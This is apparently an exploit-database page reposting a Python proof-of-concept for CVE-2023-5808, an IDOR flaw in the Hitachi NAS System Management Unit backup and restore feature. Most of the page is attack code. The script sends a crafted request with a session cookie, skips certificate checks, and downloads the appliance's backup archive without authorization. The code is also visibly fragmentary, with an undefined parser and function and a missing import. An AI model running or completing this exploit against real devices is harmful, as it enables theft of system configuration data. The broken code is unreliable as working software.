Hitachi nas (hnas) system management unit (smu) backup & restore < 14.8.7825.01 idor Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2024-03-11 |
Type : webapps |
Platform : hardware
This exploit / vulnerability Hitachi nas (hnas) system management unit (smu) backup & restore < 14.8.7825.01 idor is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/usr/bin/python3
#
# Title: Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability
# CVE: CVE-2023-5808
# Date: 2023-12-13
# Exploit Author: Arslan Masood (@arszilla)
# Vendor: https://www.hitachivantara.com/
# Version: < 14.8.7825.01
# Tested On: 13.9.7021.04
import argparse
from datetime import datetime
from os import getcwd
# Create --host argument:
parser.add_argument(
"--host",
required=True,
type=str,
help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"
)
# Send the request:
with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:
with open(filename, 'wb') as backup_archive:
# Write the zip file to the CWD:
backup_archive.write(file_download.content)
print(f"{filename} has been downloaded to {getcwd()}")
if __name__ == "__main__":
download_file(args.host, args.id, args.sso)
Hitachi nas (hnas) system management unit (smu) backup & restore < 14.8.7825.01 idor